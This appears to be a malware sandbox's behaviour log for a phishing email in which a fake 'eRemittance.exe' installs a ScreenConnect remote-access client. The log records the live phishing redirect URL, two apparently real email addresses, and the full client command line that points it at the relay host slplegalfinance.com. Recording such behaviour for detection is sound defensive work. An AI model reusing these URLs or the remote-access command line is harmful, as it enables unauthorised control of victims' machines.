Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIE23F.tmp

Source: classification engine

Classification label: mal84.evad.winEML@45/54@14/141

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250117T1245400379-7096.etl

Source: C:\Users\user\Downloads\eRemittance.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Downloads\eRemittance.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID83C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4839593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D1E851C1-780A-4AD8-8E17-7E00F8FC2E73" "7773720D-9100-489C-95B7-23FC0504D7F1" "7096" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=5f30d80bfc49ccfd2ec3457f652892e61ef725c0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2064,i,3225509582482086580,13909682747020890932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D1E851C1-780A-4AD8-8E17-7E00F8FC2E73" "7773720D-9100-489C-95B7-23FC0504D7F1" "7096" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5364 --field-trial-handle=2064,i,3225509582482086580,13909682747020890932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\Downloads\eRemittance.exe "C:\Users\user\Downloads\eRemittance.exe"
Source: C:\Users\user\Downloads\eRemittance.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6059364A692FB498A42B140D258E2948 C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID83C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4839593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=5f30d80bfc49ccfd2ec3457f652892e61ef725c0
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D2104C54B219E825B1B95ED4C489F475
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2064,i,3225509582482086580,13909682747020890932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5364 --field-trial-handle=2064,i,3225509582482086580,13909682747020890932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F0AA89784B24B42B9C239E4001478082 E Global\MSI0000
Source: unknown	Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=b3dedd11-6dd3-4216-bf0b-f7d49e88a24d&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&c=&c=UPDATE&c=&c=&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "d04c094f-179d-486a-be2c-17bfa71a0d2c" "User"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\Downloads\eRemittance.exe "C:\Users\user\Downloads\eRemittance.exe"
Source: C:\Users\user\Downloads\eRemittance.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6059364A692FB498A42B140D258E2948 C
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D2104C54B219E825B1B95ED4C489F475
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F0AA89784B24B42B9C239E4001478082 E Global\MSI0000
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID83C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4839593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "d04c094f-179d-486a-be2c-17bfa71a0d2c" "User"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: systemeventsbrokerclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: wldp.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: amsi.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: userenv.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: profapi.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: version.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: propsys.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: edputil.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: netutils.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: slc.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: sppc.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Downloads\eRemittance.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msihnd.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll
